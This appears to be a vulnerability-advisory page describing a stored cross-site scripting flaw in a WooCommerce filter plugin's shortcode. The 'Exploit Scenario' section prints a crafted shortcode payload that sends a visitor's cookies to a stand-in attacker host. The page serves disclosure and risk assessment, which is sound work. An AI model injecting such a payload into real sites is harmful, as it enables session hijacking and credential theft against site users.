Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
PR:L confirmed by Contributor-level requirement; S:C reflects browser-context execution; UI:N because stored XSS triggers on passive page load without victim action.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The Avalon23 Products Filter for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'avalon23_qr' shortcode in all versions up to, and including, 1.1.6. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes (notably 'title' and 'fixed_link') which are concatenated directly into single-quoted HTML attributes by the AVALON23_HELPER::draw_html_item() helper without esc_attr() or any other encoding. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AnalysisAI
Stored Cross-Site Scripting in Avalon23 Products Filter for WooCommerce (≤1.1.6) allows authenticated Contributors to inject persistent JavaScript via the avalon23_qr shortcode's title and fixed_link attributes, which are concatenated unsanitized into single-quoted HTML attributes by AVALON23_HELPER::draw_html_item(). The payload is stored in the WordPress database and executes in the browser of any user who subsequently visits an injected page, enabling session hijacking, credential theft, or unauthorized administrative actions. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires a WordPress account with at minimum Contributor-level privileges, which is necessary to author or edit posts containing shortcodes. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 score of 6.4 (Medium) with vector AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N accurately reflects the key risk drivers: network-delivered, low-complexity, with Scope Changed (the victim browser becomes the execution context). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A threat actor registers or compromises a Contributor-level WordPress account on the target site, then creates or edits a post embedding a crafted `[avalon23_qr title="x' onmouseover='fetch('https://attacker.example/c?'+document.cookie)" fixed_link="http://example.com"]` shortcode. The payload is stored in the WordPress database unsanitized. … |
| Remediation | No vendor-released patch has been identified at time of analysis for versions up to and including 1.1.6. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38683
GHSA-hxr4-2fcj-gcw3